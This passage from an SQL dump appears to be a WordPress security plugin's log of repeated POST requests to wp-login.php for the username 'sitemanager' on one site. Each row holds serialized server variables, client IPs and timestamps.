Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45908\";s:11:\"REMOTE_ADDR\";s:14:\"67.223.118.141\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745537843.388402;s:12:\"REQUEST_TIME\";i:1745537843;}}','67.223.118.141',0,'2025-04-25 05:07:25','1970-01-01 00:00:00'),(94212,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50646\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.67\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745538230.750232;s:12:\"REQUEST_TIME\";i:1745538230;}}','198.54.114.67',0,'2025-04-25 05:13:52','1970-01-01 00:00:00'),(94213,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57914\";s:11:\"REMOTE_ADDR\";s:12:\"63.250.32.87\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745538617.5513721;s:12:\"REQUEST_TIME\";i:1745538617;}}','63.250.32.87',0,'2025-04-25 05:20:19','1970-01-01 00:00:00'),(94214,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59792\";s:11:\"REMOTE_ADDR\";s:12:\"23.239.27.53\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745539008.1119909;s:12:\"REQUEST_TIME\";i:1745539008;}}','23.239.27.53',0,'2025-04-25 05:26:49','1970-01-01 00:00:00'),(94215,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42022\";s:11:\"REMOTE_ADDR\";s:13:\"187.33.241.37\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745539404.1421659;s:12:\"REQUEST_TIME\";i:1745539404;}}','187.33.241.37',0,'2025-04-25 05:33:26','1970-01-01 00:00:00'),(94216,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44660\";s:11:\"REMOTE_ADDR\";s:15:\"162.213.251.113\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745539801.2777729;s:12:\"REQUEST_TIME\";i:1745539801;}}','162.213.251.113',0,'2025-04-25 05:40:03','1970-01-01 00:00:00'),(94217,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56008\";s:11:\"REMOTE_ADDR\";s:13:\"164.160.91.19\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745540202.976784;s:12:\"REQUEST_TIME\";i:1745540202;}}','164.160.91.19',0,'2025-04-25 05:46:44','1970-01-01 00:00:00'),(94218,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54368\";s:11:\"REMOTE_ADDR\";s:12:\"195.20.19.31\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745540600.0818241;s:12:\"REQUEST_TIME\";i:1745540600;}}','195.20.19.31',0,'2025-04-25 05:53:21','1970-01-01 00:00:00'),(94219,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38276\";s:11:\"REMOTE_ADDR\";s:14:\"103.118.29.120\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745541033.859915;s:12:\"REQUEST_TIME\";i:1745541033;}}','103.118.29.120',0,'2025-04-25 06:00:35','1970-01-01 00:00:00'),(94220,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35354\";s:11:\"REMOTE_ADDR\";s:14:\"78.155.192.110\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745541430.94801;s:12:\"REQUEST_TIME\";i:1745541430;}}','78.155.192.110',0,'2025-04-25 06:07:12','1970-01-01 00:00:00'),(94221,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52618\";s:11:\"REMOTE_ADDR\";s:12:\"68.65.122.90\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745541823.4591939;s:12:\"REQUEST_TIME\";i:1745541823;}}','68.65.122.90',0,'2025-04-25 06:13:45','1970-01-01 